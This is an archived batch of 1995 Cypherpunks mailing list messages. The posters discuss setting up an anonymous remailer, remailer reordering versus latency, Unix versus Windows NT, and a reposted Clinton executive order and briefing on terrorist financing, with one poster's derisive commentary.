From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mo Baxter <morpheus@math.whitman.edu>
Date: Wed, 25 Jan 95 19:57:07 PST
To: cypherpunks@toad.com
Subject: Starting a remailer
Message-ID: <Pine.SOL.3.91.950125195543.7649A-100000@calvin>
MIME-Version: 1.0
Content-Type: text/plain


I need info on what's needed to operate a secure remailer out of an edu
address.  I'd appreciate anything about software, installation, maintenance,
problems, etc... 

Thanks,
	Mo

		"We're all in it together."
				--Harry Tuttle 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Marcus <datadec@cs.UCR.edu>
Date: Wed, 25 Jan 95 19:57:25 PST
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <m0rXFy8-0009t3C@sdwsys>
Message-ID: <199501260357.TAA07311@cs.UCR.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> > > Windows NT is supposedly secure.  Certainly its design makes
> > > it possible to write software that is intrinsically secure,
> > 
> > Why do you think that? Certainly its compartmentalism
> > is better than UNIX, and as a "ground-up" design it's
> > probably seen better QA than UNIX. However, it hasn't had
> > 20 years of interest from hackers and others. Also, while
> > the NT kernel may be *better*, several subsystems have
> > all the problems of UNIX, e.g. TCP/IP and the sequence
> > number attack.
> > 
> > I like NT, but it will never be a security panacea.
> > 
> > --
> > Richard Parratt
> 
> IMHO:
> 
> When are people going to realize that Windows NT is just a partial,
> microkernel (?right), enhanced scheduler Unix?  Add the other
> half with NutCracker or Consensys's product (what's it called?),
> and you have a Posix (not just shell) and Unix SysVR4.2
> compatible environment (Supposedly).
> 
> Unless they make too many mistakes of not staying simple with
> core concepts or not implementing enough basic building blocks,
> I can hopefully treat it as just another Unix platform.
> 
> <Obviously still irritated that companies think (or know...) that
> they can eke out more money by reinventing instead of refurbishing
> or augmenting something flexible enough to do anything they want.
> Face it: there is nothing I can't add to a Unix system, and it wouldn't
> have to affect existing programs one bit.>

Unfortunately, however, there are a lot of things that a lot of people can't
do in a unix system.  Unix is probably the most widely used unfriendly,
cryptic, and complicated operating system today.  With the upcoming of
Linux, this will probably change somewhat in the future, but until I can
teach my secretary how she can use latex to type and print her letters, we
are going to be stuck with getting us whatever the bastards at MicroSoft
think we want.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@dee.retix.com>
Date: Wed, 25 Jan 95 20:30:14 PST
To: datadec@cs.UCR.edu
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <199501260357.TAA07311@cs.UCR.EDU>
Message-ID: <199501260429.UAA14595@sleepy.retix.com>
MIME-Version: 1.0
Content-Type: text/plain



Kevin Marcus writes:

>   Unfortunately, however, there are a lot of things that a lot of people 
>   can't do in a unix system.  Unix is probably the most widely used 
>   unfriendly, cryptic, and complicated operating system today.  With the 
>   upcoming of Linux, this will probably change somewhat in the future, but 
>   until I can teach my secretary how she can use latex to type and print her 
>   letters, we are going to be stuck with getting us whatever the bastards 
>   at MicroSoft think we want.

well there is (or was) NeXTStep. always thought it was a pity that
didn't take off.

josh







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Wed, 25 Jan 95 18:11:01 PST
To: Cypherpeople <cypherpunks@toad.com>
Subject: Reordering, not Latency (Was: Re: Remailer)
In-Reply-To: <199501252158.NAA12786@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.950125210658.29117A-100000@unix2.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Jan 1995 Louis Cypher wrote:

> In recent discussions, the consensus 
> was that message reordering was superior to (and the actual intent of) 
> latency.  Reordering is not sufficient, a form of latency is required 
> to make it effective.

	I have literally hundreds of messages archived from the CP list of
several months back where Eric Hughes repeatedly states that reordering,
not latency, is the key. Reordering of a sufficient magnitude will
introduce latency inherently. Otherwise you are still vulnerable to 
traffic analysis (which is an art, not a science, remember).

--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 25 Jan 95 21:14:43 PST
To: joshua@dee.retix.com (joshua geller)
Subject: Unix, Linux, NeXTStep, etc.
In-Reply-To: <199501260429.UAA14595@sleepy.retix.com>
Message-ID: <199501260513.VAA11989@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


(Thread name changes, as "Clinton freezes assets...." didn't seem too
relevant. Is it just me, or are people no longer even bothering to
change thread names to reflect contents?)

joshua geller wrote:

> Kevin Marcus writes:
> 
> >   Unfortunately, however, there are a lot of things that a lot of people 
> >   can't do in a unix system.  Unix is probably the most widely used 
> >   unfriendly, cryptic, and complicated operating system today.  With the 
> >   upcoming of Linux, this will probably change somewhat in the future, but 
> >   until I can teach my secretary how she can use latex to type and print her 
> >   letters, we are going to be stuck with getting us whatever the bastards 
> >   at MicroSoft think we want.
> 
> well there is (or was) NeXTStep. always thought it was a pity that
> didn't take off.

I was about to say the same thing! Not to push NeXTStep per se, as it
is apparently doomed for a variety of reasons,  but to say that
popular applications can be--and have been--ported to Unix. Many of
you presumably have first-hand knowledge of this, with apps like
Mathematica, FrameMaker, WordPerfect, etc. on Unix boxes as well as
PCs and Macs.

This is separate, I think, from the issue of teaching secretaries
LaTex...that sounds truly evil. (8-))

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Wed, 25 Jan 95 22:06:06 PST
To: cypherpunks@toad.com
Subject: Re: FrameMaker, LaTeX, Mac, PC, UNIX, ...
Message-ID: <v0300110cab4ceb6302f4@[140.174.229.224]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:13 1/25/95, Timothy C. May wrote:

>...but to say that
>popular applications can be--and have been--ported to Unix. Many of
>you presumably have first-hand knowledge of this, with apps like
>Mathematica, FrameMaker, WordPerfect, etc. on Unix boxes as well as
>PCs and Macs.

I say this only to defend my Pedantics degree, but I believe that
FrameMaker was originally a UNIX product that was horribly ported to the
Macintosh.  (I had the unfortunate experience of using the first Mac
incarnation; I racked up some pretty good karma... :-)

>This is separate, I think, from the issue of teaching secretaries
>LaTex...that sounds truly evil. (8-))

Did that ;-)  It's amazing how much of office routine can be done with the
simple application of cut-and-paste boilerplate.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 25 Jan 95 19:12:09 PST
To: rparratt@london.micrognosis.com (Richard Parratt)
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <9501251010.AA03760@pero>
Message-ID: <m0rXFy8-0009t3C@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


...
> > Windows NT is supposedly secure.  Certainly its design makes
> > it possible to write software that is intrinsically secure,
> 
> Why do you think that? Certainly its compartmentalism
> is better than UNIX, and as a "ground-up" design it's
> probably seen better QA than UNIX. However, it hasn't had
> 20 years of interest from hackers and others. Also, while
> the NT kernel may be *better*, several subsystems have
> all the problems of UNIX, e.g. TCP/IP and the sequence
> number attack.
> 
> I like NT, but it will never be a security panacea.
> 
> --
> Richard Parratt

IMHO:

When are people going to realize that Windows NT is just a partial,
microkernel (?right), enhanced scheduler Unix?  Add the other
half with NutCracker or Consensys's product (what's it called?),
and you have a Posix (not just shell) and Unix SysVR4.2
compatible environment (Supposedly).

Unless they make too many mistakes of not staying simple with
core concepts or not implementing enough basic building blocks,
I can hopefully treat it as just another Unix platform.

<Obviously still irritated that companies think (or know...) that
they can eke out more money by reinventing instead of refurbishing
or augmenting something flexible enough to do anything they want.
Face it: there is nothing I can't add to a Unix system, and it wouldn't
have to affect existing programs one bit.>

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.17Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@well.sf.ca.us>
Date: Wed, 25 Jan 95 22:30:50 PST
To: cypherpunks@toad.com
Subject: Get ready to start breaking rocks for Herr Klinton
Message-ID: <199501260630.WAA24101@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the long post.  I cut it down as much as I could, but I 
think maybe people ought to read this.

As I understand it, one "terrorist" message through your remailer and
you're breaking rocks while some FBI jerk is playing Doom on your
PC.

Cheers,

Brad


Heil Bill!
- - - - - - - - - - begin included text - - - - - - - - - - - -
                     THE WHITE HOUSE
  
              Office of the Press Secretary
  
  _____________________________________________________
  
  For Immediate Release            January 24, 1995
  
  
                     EXECUTIVE ORDER
  
                      - - - - - - -
  
       PROHIBITING TRANSACTIONS WITH TERRORISTS WHO
    THREATEN TO DISRUPT THE MIDDLE EAST PEACE PROCESS
  
  
       By the authority vested in me as President by 
  the Constitution and the laws of the United States of 
  America, including the International Emergency 
  Economic Powers Act (50 U.S.C. 1701 et seq.) (IEEPA), 
  the National Emergencies Act (50 U.S.C. 1601 
  et seq.), and section 301 of title 3, United States 
  Code,
  
       I, WILLIAM J. CLINTON, President of the United 
  States of America, find that grave acts of violence 
  committed by foreign terrorists that disrupt the 
  Middle East peace process constitute an unusual and 
  extraordinary threat to the national security, 
  foreign policy, and economy of the United States, and 
  hereby declare a national emergency to deal with that 
  threat.
  
       I hereby order:
  
       Section 1.  Except to the extent provided in 
  section 203(b)(3) and (4) of IEEPA (50 U.S.C. 
  1702(b)(3) and (4)) and in regulations, orders, 
  directives, or licenses that may be issued pursuant 
  to this order, and notwithstanding any contract 
  entered into or any license or permit granted prior 
  to the effective date:  (a) all property and 
  interests in property of:
  
       (i)  the persons listed in the Annex to this 
  order;
  
       (ii) foreign persons designated by the Secretary 
       of State, in coordination with the Secretary of 
       the Treasury and the Attorney General, because 
       they are found:
  
       (A)  to have committed, or to pose a significant 
       risk of committing, acts of violence that have 
       the purpose or effect of disrupting the Middle 
       East peace process, or
  
       (B)  to assist in, sponsor, or provide 
       financial, material, or technological support 
       for, or services in support of, such acts of 
       violence; and
  
       (iii) persons determined by the Secretary of the 
       Treasury, in coordination with the Secretary of 
       State and the Attorney General, to be owned or 
       controlled by, or to act for or on behalf of, 
       any of the foregoing persons, that are in the 
       United States, that hereafter come within the 
       United States, or that hereafter come within the 
       possession or control of United States persons, 
       are blocked;
  
       (b)  any transaction or dealing by United States 
  persons or within the United States in property or 
  interests in property of the persons designated in or 
  pursuant to this order is prohibited, including the 
  making or receiving of any contribution of funds, 
  goods, or services to or for the benefit of such 
  persons;

       (c)  any transaction by any United States person 
  or within the United States that evades or avoids, or 
  has the purpose of evading or avoiding, or attempts 
  to violate, any of the prohibitions set forth in this 
  order, is prohibited.
  
       Sec. 2. For the purposes of this order:  (a) the 
  term "person" means an individual or entity;
  
       (b)  the term "entity" means a partnership, 
  association, corporation, or other organization, 
  group, or subgroup;
  
       (c)  the term "United States person" means any 
  United States citizen, permanent resident alien, 
  entity organized under the laws of the United States 
  (including foreign branches), or any person in the 
  United States; and
  
       (d)  the term "foreign person" means any citizen 
  or national of a foreign state (including any such 
  individual who is also a citizen or national of the 
  United States) or any entity not organized solely 
  under the laws of the United States or existing 
  solely in the United States, but does not include a 
  foreign state.
  
       Sec. 3.  I hereby determine that the making of 
  donations of the type specified in section 
  203(b)(2)(A) of IEEPA (50 U.S.C. 1702(b)(2)(A)) by 
  United States persons to persons designated in or 
  pursuant to this order would seriously impair my 
  ability to deal with the national emergency declared 
  in this order, and hereby prohibit such donations as 
  provided by section 1 of this order.
  
       Sec. 4.  (a) The Secretary of the Treasury, in 
  consultation with the Secretary of State and, as 
  appropriate, the Attorney General, is hereby 
  authorized to take such actions, including the 
  promulgation of rules and regulations, and to employ 
  all powers granted to me by IEEPA as may be necessary 
  to carry out the purposes of this order.  The 
  Secretary of the Treasury may redelegate any of these 
  functions to other officers and agencies of the 
  United States Government.  All agencies of the 
  United States Government are hereby directed to take 
  all appropriate measures within their authority to 
  carry out the provisions of this order.
  
       (b)  Any investigation emanating from a possible 
  violation of this order, or of any license, order, or 
  regulation issued pursuant to this order, shall first 
  be coordinated with the Federal Bureau of 
  Investigation (FBI), and any matter involving 
  evidence of a criminal violation shall be referred to 
  the FBI for further investigation.  The FBI shall 
  timely notify the Department of the Treasury of any 
  action it takes on such referrals.
  
       Sec. 5.  Nothing contained in this order shall 
  create any right or benefit, substantive or 
  procedural, enforceable by any party against the 
  United States, its agencies or instrumentalities, its 
  officers or employees, or any other person.
  
       Sec. 6.  (a) This order is effective at 12:01 
  a.m., eastern standard time on January 24, 1995.
  
       (b) This order shall be transmitted to the 
  Congress and published in the Federal Register.
  
  
       	    	      	   	WILLIAM J. CLINTON
  
  THE WHITE HOUSE,
      January 23, 1995.
  
  
  
  
                                ANNEX
  
              TERRORIST ORGANIZATIONS WHICH THREATEN TO
                DISRUPT THE MIDDLE EAST PEACE PROCESS
  
  
  Abu Nidal Organization (ANO)
  
  Democratic Front for the Liberation of Palestine (DFLP)
  
  Hizballah
  
  Islamic Gama'at (IG)
  
  Islamic Resistance Movement (HAMAS)
  
  Jihad
  
  Kach
  
  Kahane Chai
  
  Palestinian Islamic Jihad-Shiqaqi faction (PIJ)
  
  Palestine Liberation Front-Abu Abbas faction (PLF-Abu Abbas)
  
  Popular Front for the Liberation of Palestine (PFLP)
  
  Popular Front for the Liberation of Palestine-General Command 
  (PFLP-GC)
  
  
  
  
                               #  #  #
  




                     THE WHITE HOUSE
  
              Office of the Press Secretary
  
  _____________________________________________________
  
  For Immediate Release	   	 January 23, 1995
  
  
  
                     EXECUTIVE ORDER
  
                      - - - - - - -
  
     PRESIDENT'S ADVISORY BOARD ON ARMS PROLIFERATION 
			 POLICY
  
  
       By the authority vested in me as President by 
  the Constitution and the laws of the United States of 
  America, including section 1601 of the National 
  Defense Authorization Act, Fiscal Year 1994 (Public 
  Law 103-160), and the Federal Advisory Committee Act, 
  as amended (5 U.S.C. App. 2) ("Act"), except that 
  subsections (e) and (f) of section 10 of such Act do 
  not apply, and section 301 of title 3, United States 
  Code, it is hereby ordered as follows:
  
       Section 1.  Establishment.  There is established 
  within the Department of Defense the "President's 
  Advisory Board on Arms Proliferation Policy" 
  ("Board").  The Board shall consist of five members 
  who shall be appointed by the President from among 
  persons in private life who are noted for their 
  stature and expertise regarding the proliferation of 
  strategic and advanced conventional weapons and are 
  from diverse backgrounds.  The President shall 
  designate one of the members as Chairperson of the 
  Board.
  
       Sec. 2.  Functions.  The Board shall advise the 
  President on implementation of United States 
  conventional arms transfer policy, other issues 
  related to arms proliferation policy, and on other 
  matters deemed appropriate by the President.  The 
  Board shall report to the President through the 
  Assistant to the President for National Security 
  Affairs.
  
       Sec. 3.  Administration.  (a) The heads of 
  executive agencies shall, to the extent permitted by 
  law, provide to the Board such information as it may 
  require for the purpose of carrying out its 
  functions.
  
       (b) Members of the Board shall serve without 
  compensation, but shall be allowed travel expenses, 
  including per diem in lieu of subsistence, as 
  authorized by law, including 5 U.S.C. 5701-5707 and 
  section 7(d) of the Act, for persons serving 
  intermittently in government service.
  
       (c) The Department of Defense or the head of any 
  other Federal department or agency may detail to the 
  Board, upon request of the Chairperson of the Board, 
  any of the personnel of the department or agency to 
  assist the Board in carrying out its duties.  
  
       (d) The Secretary of Defense shall designate a 
  federally funded research and development center with 
  expertise in the matters covered by the Board to 
  provide the Board with such support services as the 
  Board may need to carry out its duties.
  
       (e) The Department of Defense shall provide the 
  Board with administrative services, facilities, 
  staff, and other support services necessary for the 
  performance of its functions.

       Sec. 4.  General.  (a) The Board shall terminate 
  30 days after the date on which the President submits 
  the final report of the Board to the Congress.
  
       (b) For reasons of national security or for such 
  other reasons as specified in section 552(b) of 
  title 5, United States Code, the Board shall not 
  provide public notice or access to meetings at which 
  national security information will be discussed.  
  Authority to make such determinations shall reside 
  with the Secretary of Defense or his designee who 
  must be an official required to be appointed by and 
  with the advice and consent of the Senate.
  
       (c) Information made available to the Board 
  shall be given all necessary security protection in 
  accordance with applicable laws and regulations.
  
       (d) Each member of the Board and each member of 
  the Board's staff shall execute an agreement not to 
  reveal any classified information obtained by virtue 
  of his or her service with the Board except as 
  authorized by applicable law and regulations.
  
  
  
  
       	    	      	   	     WILLIAM J. CLINTON
  



                     THE WHITE HOUSE
  
              Office of the Press Secretary
  
  _____________________________________________________
  
  For Immediate Release                January 24, 1995
  
  
  TO THE CONGRESS OF THE UNITED STATES:
  
  
       Pursuant to section 204(b) of the International 
  Emergency Economic Powers Act, 50 U.S.C. 1703(b) and 
  section 301 of the National Emergencies Act, 50 
  U.S.C. 1631, I hereby report that I have exercised my 
  statutory authority to declare a national emergency 
  with respect to the grave acts of violence committed 
  by foreign terrorists that threaten to disrupt the 
  Middle East peace process and to issue an Executive 
  order that:
  
  	    Blocks all property, including bank 
            deposits, of foreign persons or 
            organizations designated in the Executive 
            order or pursuant thereto, which is in the 
            United States or in the control of United 
            States persons, including their overseas 
            branches; and
  
  	    Prohibits any transaction or dealing by 
            United States persons in such property, 
            including the making or receiving of any 
            contribution of funds, goods, or services 
            to or for the benefit of such designated 
            persons.
  
       I have designated in the Executive order 
  12 foreign organizations that threaten to use 
  violence to disrupt the Middle East peace process.  I 
  have authorized the Secretary of State to designate 
  additional foreign persons who have committed, or 
  pose a significant risk of committing, acts of 
  violence that have the purpose or effect of 
  disrupting the Middle East peace process, or who 
  assist in, sponsor, or provide financial, material or 
  technological support for, or services in support of, 
  such acts of violence.  Such designations are to be 
  made in coordination with the Secretary of the 
  Treasury and the Attorney General.
  
       The Secretary of the Treasury is further 
  authorized to designate persons or entities that he 
  determines, in coordination with the Secretary of 
  State and the Attorney General, are owned or 
  controlled by, or acting for or on behalf 
  of, any of the foreign persons designated under this 
  order.  The Secretary of the Treasury is also 
  authorized to issue regulations in exercise of my 
  authorities under the International Emergency 
  Economic Powers Act to implement these measures in 
  consultation with the Secretary of State and the 
  Attorney General and to coordinate such 
  implementation with the Federal Bureau of 
  Investigation.  All Federal agencies are directed to 
  take actions within their authority to carry out the 
  provisions of the Executive order.
  
       I am enclosing a copy of the Executive order 
  that I have issued.  The order was effective at 12:01 
  a.m., eastern standard time on January 24, 1995.
  
       I have authorized these measures in response to 
  recurrent acts of international terrorism that 
  threaten to disrupt the Middle East peace process.  
  They include such acts as the bomb attacks in Israel 
  this past weekend and other recent attacks in Israel, 
  attacks on government authorities in Egypt, threats 
  against Palestinian authorities in the autonomous 
  regions, and the bombing of the Jewish Mutual 
  Association building in Buenos Aires, as well as the 
  car bomb at the Israeli Embassy in London.

       Achieving peace between Israel and its neighbors 
  has long been a principal goal of American foreign 
  policy.  Resolving this conflict would eliminate a 
  major source of instability in a part of the world in 
  which we have critical interests, contribute to the 
  security and well-being of Israel, and strengthen 
  important bilateral relationships in the Arab world.
  
       Attempts to disrupt the Middle East peace 
  process through terrorism by groups opposed to peace 
  have threatened and continue to threaten vital 
  interests of the United States, thus constituting an 
  unusual and extraordinary threat to the national 
  security, foreign policy, and economy of the United 
  States.
  
       Terrorist groups engaging in such terrorist acts 
  receive financial and material support for their 
  efforts from persons in the Middle East and elsewhere 
  who oppose that process.  Individuals and groups in 
  the United States, too, have been targets of 
  fundraising efforts on behalf of terrorist 
  organizations.
  
       Fundraising for terrorism and use of the U.S. 
  banking system for transfers on behalf of such 
  organizations are inimical to American interests.  
  Further, failure to take effective action against 
  similar fundraising and transfers in foreign 
  countries indicates the need for leadership by the 
  United States on this subject.  Thus, it is necessary 
  to provide the tools to combat any financial support 
  from the United States for such terrorist activities.  
  The United States will use these actions on our part 
  to impress on our allies in Europe and elsewhere the 
  seriousness of the danger of terrorist funding 
  threatening the Middle East peace process, and to 
  encourage them to adopt appropriate and effective 
  measures to cut off terrorist fundraising and the 
  harboring of terrorist assets in their territories 
  and by their nationals.
  
       The measures we are taking demonstrate our 
  determination to thwart acts of terrorism that 
  threaten to disrupt the Middle East peace process by 
  attacking any material or financial support for such 
  acts that may emanate from the United States.
  
  
  
  
       	    	      	   	     WILLIAM J. CLINTON
  
  
  
  
  THE WHITE HOUSE,
      January 23, 1995.
  
  
  
  
                         #  #  #
  


                            THE WHITE HOUSE

                     Office of the Press Secretary

________________________________________________________________________
For Immediate Release                                   January 24, 1995

                         BACKGROUND BRIEFING
                                  BY
                   SENIOR ADMINISTRATION OFFICIALS


                          The Briefing Room


2:14 P.M. EST

[I've cut out 90% of this.  E-mail me if you want a complete copy -bd]
	     

[...]	     On October 24th, at his speech at Georgetown University 
on the peace process, Secretary Christopher mentioned our concern 
about this and said that we are looking at a number of options to 
address both the funding threat and to strengthen our 
counterterrorism activities in other ways.  And this executive order 
and the package of laws are a result of that.
	     
	     These are only part of a much larger effort that the 
administration has been making to counter terrorism around the world.
The executive order will also support the efforts which we have been 
making now for a long time to encourage similar efforts by foreign 
governments to prevent funding from their countries to these 
terrorist organizations.  By blocking transfers to these terrorist 
groups and individuals and by freezing accounts, while we are not 
certain about the volume of funds that we will seize or stop, we know 
that we are sending a very powerful message to potential donors by 
criminalizing this activity.
	     
	     The executive order, as you know, designates 12 
terrorist organizations.  We have a very large body of public and 
intelligence information which documents terrorist acts by these 
organizations going way back.  And it also designates 18 individuals 
who are associated with these groups.  The process provides an 
opportunity to designate additional groups and additional individuals 
as we work our way through this.  [...]
	     
	     SENIOR ADMINISTRATION OFFICIAL:  Thank you.  Good 
afternoon.  The legislation that has been drafted is designed to 
strengthen our ability not only to deter terrorist acts, but to also 
punish those who engage in such terrorism.  It is a comprehensive 
bill that we have compiled.  It is still being worked on.  We will be 
working closely with the Hill to perfect it, and it has multiple 
provisions, but I'd like to highlight, at this point, essentially 
five broad areas, many of which are designed to ensure, among other 
things, that this country is not used as a base of operations for 
terrorist acts abroad.
	     
	     To begin with, it creates a new federal statute which 
would provide clear federal jurisdiction for any international 
terrorist act committed in the United States.  As many of you know, 
this has been a particularly critical point, especially in light of 
various events in the United States and highlighted the question of 
the existing scope of federal jurisdiction.
	     
	     We also have provisions in the draft criminalizing 
conspiracies in the United States to engage in terrorist acts 
committed outside the United States.  This is an extension of the 
Material Support Act and is critical, I think, for ensuring that the 
United States is not, as I said, used as a launching pad for 
terrorist attacks anywhere in the world.
	     
	     Another provision which we think is critical is to 
provide expedited deportation proceedings for aliens who engage in 
terrorist activities and to expedite their removal from the United 
States.  
	     
	     The fourth provides a comprehensive mechanism for 
preventing fundraising in the United States in support of 
international terrorist activities overseas.
	     
	     And the fifth is designed to facilitate the 
investigation of matters involving explosives, and implements 
recently concluded international convention for ensuring that 
explosives contain "taggets," if you will, insertion of chemical 
agents into plastic explosives, which will make them more detectible 
and facilitate investigation.
	     
	     As I said, there are other provisions of the bill, which 
are critical.  They're more of a technical nature, and would, in 
fact, greatly facilitate investigation, prosecution and enhance the 
range of the sanctions that can be applied.
	     
	     At this point, we'd be glad to take questions. [...]

[SENIOR ADMINISTRATION ASSHO...er...OFFICIAL...]	     	     
	     The legislation we propose will contain other devices, 
if you will, to facilitate the investigations. 
	     
	     Q	  Like wire-tapping?
	     
	     SENIOR ADMINISTRATION OFFICIAL:  A variety, yes.  There 
will be certain provisions.
	     
	     Q	  Isn't that against the Constitution?
	     
	     SENIOR ADMINISTRATION OFFICIAL:  Oh, no, of course not.  
I mean, appreciate that we have a variety of existing, statutorily 
approved mechanisms.  We are trying to, consistent with 
constitutional requirements, be able to afford ourselves the widest 
range of enforcement opportunities.  Now, that is not being designed 
to, in any way, circumvent or deprive people of constitutional 
protections.  But on the other hand, to the extent that wire-tap 
authority would facilitate investigations in this area, yes, we would 
like authority.  But I'm saying that this is just one opportunity, if 
you will, for dealing with the problem of fundraising. [...]
	     

	     Q	  I'll try to keep it short.  Wire-tapping still with 
the judge's prior approval?
	     
	     SENIOR ADMINISTRATION OFFICIAL:  Yes.
	     
	     Q	  Okay, you can eliminate hearings now, the right of 
somebody to have a hearing before he's deported, are you going to try 
to shortcut that?  And, third, what about the right to associate so 
far as going to a mosque and contributing to a -- you're really 
touching on constitutional rights, and you know it as well as I do.
	     
	     SENIOR ADMINISTRATION OFFICIAL:  Let me take issue with 
your characterization.  No, we're not touching -- obviously, the 
legislation in this area has to be drafted with tremendous 
sensitivity to those issues, and I think we have.  We have, in fact, 
brought to bear great concerns about civil liberties of Americans and 
non-Americans in this country, and what we have designed, I would 
suggest to you, you will see is consistent with those constitutional 
limitations. 
	     
	     But on the other hand, as the court has repeatedly said, 
Constitution is not a suicide pact.  It does permit us to move 
aggressively in this area consistent with the Constitution to be able 
to protect ourselves and our vital national security.
	     
	     Now, with respect to this wire-tapping, all we're 
suggesting, among other things, is to take existing authority, which 
now has an articulation of a whole range of offenses, that permits 
legal wiretapping, and add terrorism to it.  Okay?  
	     
	     As far as deportations -- deportations, what we want in 
connection with terrorism is a methodology consistent with 
constitutional limitations to enable us to expedite the deportation 
process, utilizing federal district courts and federal district 
judges and to have a mechanism -- have a mechanism so that to the 
extent that we have to rely on classified information --
	     
	     Q	  Closed courts, closed hearings?
	     
	     SENIOR ADMINISTRATION OFFICIAL:  No, no.  Public 
hearings, procedures consistent with the same procedures utilized in 
criminal cases to ensure the protection of classified information, 
consistent with constitutional limitations.  That is what we are 
proposing.  [...]
	     
	     Q	  Is the CIA obligated under this Executive Order to 
help you and State and the rest with regard to intelligence on these 
various groups that might be funneling money to eventual terrorists?
	     
	     SENIOR ADMINISTRATION OFFICIAL:  The CIA and other 
American intelligence agencies are a full partner in this process, 
and their work overseas and the work of the FBI here at home is 
essential to make this work.  And they're anxious to help, and they 
are helping.
	     
	     Q	  There's a broad paragraph in the order that talks 
about other federal agencies without naming them, and that's why I 
asked the question, whether that is the paragraph that brings the CIA 
into the picture. [...]
	     	     
	     Q	  What if somebody is caught in this and claims to be 
innocent, that they're involved in truly humanitarian efforts?  Do 
they have to sue the federal government to get access to their funds?
	     
	     SENIOR ADMINISTRATION OFFICIAL:  No, there are appeal 
procedures -- this has happened obviously much before -- we have a 
lot of experience in this program.  We have appeal procedures, people 
would apply to the Treasury Department Office of Foreign Assets 
Control, and there are appeal mechanisms in place.  There are 
obviously always judicial avenues, but there are nonjudicial avenues 
as well -- administrative avenues to work this out.
	     






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 25 Jan 95 20:05:48 PST
To: datadec@cs.UCR.edu (Kevin Marcus)
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <199501260357.TAA07311@cs.UCR.EDU>
Message-ID: <m0rXGoq-0009t3C@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


...
> > <Obviously still irritated that companies think (or know...) that
> > they can eke out more money by reinventing instead of refurbishing
> > or augmenting something flexible enough to do anything they want.
> > Face it: there is nothing I can't add to a Unix system, and it wouldn't
> > have to affect existing programs one bit.>
> 
> Unfortunately, however, there are a lot of things that a lot of people can't
> do in a unix system.  Unix is probably the most widely used unfriendly,
> cryptic, and complicated operating system today.  With the upcoming of
> Linux, this will probably change somewhat in the future, but until I can
> teach my secretary how she can use latex to type and print her letters, we
> are going to be stuck with getting us whatever the bastards at MicroSoft
> think we want.
> 

While in a way what you say is true, latex isn't Unix, the shell isn't the
only interface to Unix, etc.  Unixware's setup was an example.  Solaris's
isn't too bad (setup printers, mounts, user accounts, ttys (kinda)), etc.
Put Frame, WP, MS Word (some version at least), Lotus 123, Powerbuilder
(was going to be out end 94, haven't kept track), etc. on a Unix
system that boots to xdm and you have a pretty darn good replacement
for Windows/NT/OS2, etc.

With any kind of support staff, Unix systems are much smoother and robust
than PCs.  I've seen it at several really large sites.  No comparison.

Ok, I guess I'm getting 'religious' here, which isn't the place...

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.17Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Wed, 25 Jan 95 21:20:18 PST
To: cypherpunks@toad.com
